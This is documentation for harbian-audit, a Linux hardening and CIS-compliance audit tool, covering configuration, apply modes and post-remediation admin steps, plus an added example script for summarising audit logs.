Total Passed Checks : [ 239/278 ]
Total Failed Checks : [ 39/278 ]
Enabled Checks Percentage : 100.00 %
Conformity Percentage : 85.97 %
$ sudo bin/hardening.sh --set-hardening-level 5
$ sudo bin/hardening.sh --apply
hardening [INFO] Treating /home/test/harbian-audit/bin/hardening/1.1_install_updates.sh
1.1_install_updates [INFO] Working on 1.1_install_updates
1.1_install_updates [INFO] Checking Configuration
1.1_install_updates [INFO] Performing audit
1.1_install_updates [INFO] Checking if apt needs an update
1.1_install_updates [INFO] Fetching upgrades ...
1.1_install_updates [ OK ] No upgrades available
1.1_install_updates [INFO] Applying Hardening
1.1_install_updates [ OK ] No Upgrades to apply
1.1_install_updates [ OK ] Check Passed
[...]
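
The audit output above can be post-processed once it is saved to a file. The following is an added example, not part of harbian-audit: it lists failed checks, recomputes the conformity ratio, and reports checks that passed in a baseline log but fail in a later one. The `[ KO ] Check Failed` line format and the sample log are assumptions constructed for illustration; only the `[ OK ] Check Passed` form appears on this page.

```shell
#!/bin/sh
# Added example: summarise saved `hardening.sh --audit-all` output.
# "<check> [ OK ] Check Passed" is the format shown on this page; the
# "[ KO ] Check Failed" form used for failures is an assumption.

# Constructed sample log (not output from a real host).
sample_log() {
cat <<'EOF'
hardening [INFO] Treating /home/test/harbian-audit/bin/hardening/1.1_install_updates.sh
1.1_install_updates [INFO] Performing audit
1.1_install_updates [ OK ] No upgrades available
1.1_install_updates [ OK ] Check Passed
7.4.4_hosts_deny [INFO] Performing audit
7.4.4_hosts_deny [ KO ] constructed failure message
7.4.4_hosts_deny [ KO ] Check Failed
13.15_check_duplicate_gid [ OK ] No duplicate GIDs
13.15_check_duplicate_gid [ OK ] Check Passed
EOF
}

# Names of checks whose final verdict is "Check Failed", one per line.
failed_checks() {
  awk '$2 == "[" && $3 == "KO" && $4 == "]" && $5 == "Check" && $6 == "Failed" { print $1 }' "$@"
}

# Recompute the summary ratio: passed / (passed + failed) verdict lines.
conformity() {
  awk '
    $2 == "[" && $5 == "Check" && $6 == "Passed" { pass++ }
    $2 == "[" && $5 == "Check" && $6 == "Failed" { fail++ }
    END {
      total = pass + fail
      if (total == 0) { print "no verdict lines found" > "/dev/stderr"; exit 2 }
      printf "%d/%d %.2f%%\n", pass, total, 100 * pass / total
    }' "$@"
}

# Checks that passed in baseline log $1 but fail in current log $2.
regressions() {
  awk '
    $5 != "Check" { next }
    FILENAME == ARGV[1] { if ($6 == "Passed") ok[$1] = 1; next }
    $6 == "Failed" && ($1 in ok) { print $1 }
  ' "$1" "$2"
}

sample_log | failed_checks   # checks to triage first
sample_log | conformity      # ratio over the verdict lines
```

Comparing the log taken before `--apply` with one taken after later system changes shows configuration drift without re-reading the whole output.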

Usage

Pre-Install
If Debian GNU/Linux was installed over the network from a minimal CD, install these packages before using the hardening tool:
sudo apt-get install -y bc net-tools pciutils network-manager
On Redhat/CentOS, install these packages before using the hardening tool:
sudo yum install -y bc net-tools pciutils NetworkManager epel-release

Pre-Set
You must set a password for all users before hardening. Otherwise, you will not be able to log in after the hardening is completed. Example (OS users: root and test):
$ sudo -s 
# passwd
# passwd test

Configuration
Hardening scripts are in bin/hardening. Each script has a corresponding configuration file in etc/conf.d/[script_name].cfg.
Each hardening script can be individually enabled from its configuration file. For example, this is the default configuration file for disable_system_accounts:
# Configuration for script of same name
status=disabled
# Put here your exceptions concerning admin accounts shells separated by spaces
EXCEPTIONS=""
status parameter may take 3 values:
  • disabled (do nothing): The script will not run.
  • audit (RO): The script will check if any change should be applied.
  • enabled (RW): The script will check if any change should be done and automatically apply what it can.
You can also enable configuration items by hardening level, using the following commands:
  1. Generate etc/conf.d/[script_name].cfg by running --audit-all on first use:
# bash bin/hardening.sh --audit-all
  2. Enable [script_name].cfg with --set-hardening-level, which sets the hardening level so that the audit entries of the corresponding level take effect:
# bash bin/hardening.sh --set-hardening-level <level>
Global configuration is in etc/hardening.cfg. This file controls the log level as well as the backup directory. Whenever a script is instructed to edit a file, it will create a timestamped backup in this directory.

Run aka "Harden your distro" (after hardening, you must perform the "After remediation" section)
To run the checks and apply the fixes, run bin/hardening.sh.
This command has 2 main operation modes:
  • --audit: Audit your system with all enabled and audit mode scripts
  • --apply: Audit your system with all enabled and audit mode scripts and apply changes for enabled scripts
Additionally, --audit-all can be used to force running all auditing scripts, including disabled ones. This will not change the system.
--audit-all-enable-passed can be used as a quick way to kickstart your configuration. It will run all scripts in audit mode. If a script passes, it will automatically be enabled for future runs. Do NOT use this option if you have already started to customize your configuration.
Use the command to harden your OS:
# bash bin/hardening.sh --apply 

After remediation (Very important)
When --apply is executed with set-hardening-level set to 5 (the highest level), you need to do the following:
  1. When applying 9.5 (Restrict Access to the su Command), you must log in to the OS with the root account, because ordinary users cannot perform subsequent operations. If you can only log in remotely over ssh, you must use the su command after the normal user logs in. Then do the following:
# sed -i '/^[^#].*pam_wheel.so.*/s/^/# &/' /etc/pam.d/su
This temporarily comments out the line containing pam_wheel.so. After you have finished using the su command, uncomment the line.
  2. When applying 7.4.4_hosts_deny.sh, the OS can no longer be reached through the ssh service, so you need to set the list of hosts allowed access in /etc/hosts.allow, for example:
# echo "ALL: 192.168.1. 192.168.5." >> /etc/hosts.allow
This example only allows 192.168.1.[1-255] 192.168.5.[1-255] to access this system. Configure it according to your situation.
  3. Set capabilities for a regular user, for example (user name is test):
# sed -i "/^root/a\test    ALL=(ALL:ALL) ALL" /etc/sudoers
  4. Set basic firewall rules. Set the corresponding firewall rules according to the applications used. HardenedLinux community basic firewall rules for Debian GNU/Linux:

iptables format rules:
Use etc.iptables.rules.v4.sh as follows:
$ INTERFACENAME="your network interfacename(Example eth0)"
$ sudo bash docs/configurations/etc.iptables.rules.v4.sh $INTERFACENAME
$ sudo -s
# iptables-save > /etc/iptables/rules.v4
# ip6tables-save > /etc/iptables/rules.v6

nft format rules:
Use nftables.conf as follows (replace eth0 with your network interface name):
$ sed -i 's/^define int_if = ens33/define int_if = eth0/g' etc.nftables.conf
$ sudo nft -f ./etc.nftables.conf
  5. When all repairs are completed, use the --final method, which will:
    1. Use the passwd command to change the passwords of the regular and root users, so that the password complexity and robustness of the pam_cracklib module configuration are applied.
    2. Reinitialize AIDE.
$ sudo bin/hardening.sh --final

Special Note
Some check items cover a variety of situations and are interdependent; they must be applied (fixed) multiple times, and the OS must be rebooted after each apply (fix).

Items that must be applied after the first application (a reboot afterwards is better)
8.1.32: once this item is set, audit rules can no longer be added.

Items that must be applied after all other applications are OK
8.4.1
8.4.2
These are all related to AIDE. It is best to apply them after all other items have been fixed, so that the integrity database matches the final state of the system.

Items that need to be fixed twice
8.1.1.2
8.1.1.3
8.1.12
4.5

Hacking
Getting the source
$ git clone https://github.com/hardenedlinux/harbian-audit.git
Adding a custom hardening script
$ cp src/skel bin/hardening/99.99_custom_script.sh
$ chmod +x bin/hardening/99.99_custom_script.sh
$ cp src/skel.cfg etc/conf.d/99.99_custom_script.cfg
Code your check, explaining what it does. Then, if you want to test it:
$ sed -i -E "s/status=.+/status=enabled/" etc/conf.d/99.99_custom_script.cfg
$ bash bin/hardening.sh --audit --only 99.99
$ bash bin/hardening.sh --apply --only 99.99

Document

Harbian-audit benchmark for Debian GNU/Linux 9
This document describes the additions for sections not included in the CIS reference documentation. It includes STIG reference documentation and additional checks recommended by the HardenedLinux community.
CIS Debian GNU/Linux 8 Benchmark v1.0.0
CIS Debian GNU/Linux 9 Benchmark v1.0.0
harbian audit Debian Linux 9 Benchmark

Manual Operation docs
How to config grub2 password protection
How to persistent iptables rules with debian 9
How to deploy audisp-remote for auditd log
How to migrating from iptables to nftables in debian10
How to persistent nft rules with debian 10

Use case docs
Nodejs + redis + mysql demo
deploy-hyperledger-cello-on-debian-9
nginx-mutual-ssl-proxy-http
nginx-mutual-ssl-proxy-tcp-udp

harbian-audit complianced image

AMI(Amazon Machine Image) Public
The HardenedLinux community has created public AMI images for three different regions.
Destination region: US East(Ohio)
AMI ID: ami-091d37e9d358aaa84
AMI Name: harbian-audit complianced for Debian GNU/Linux 9
Destination region: EU(Frankfurt)
AMI ID: ami-073725a8c2cf45418
AMI Name: harbian-audit complianced for Debian GNU/Linux 9
Destination region: Asia Pacific(Tokyo)
AMI ID: ami-06c0adb6ee5e7d417
AMI Name: harbian-audit complianced for Debian GNU/Linux 9

Docs
how to creating and making an AMI public
how to use harbian-audit complianced for GNU/Linux Debian 9

QEMU Image

Docs
How to creating and making a QEMU image of harbian-audit complianced Debian GNU/Linux 9
How to use QEMU image of harbian-audit complicanced Debian GNU/Linux 9

harbian-audit License
GPL 3.0

OVH Disclaimer
This project is a set of tools. They are meant to help the system administrator build a secure environment. While we use it at OVH to harden our PCI-DSS compliant infrastructure, we cannot guarantee that it will work for you. It will not magically secure any random host.
Additionally, quoting the License:
THIS SOFTWARE IS PROVIDED BY OVH SAS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL OVH SAS AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

OVH License
3-Clause BSD

Reference

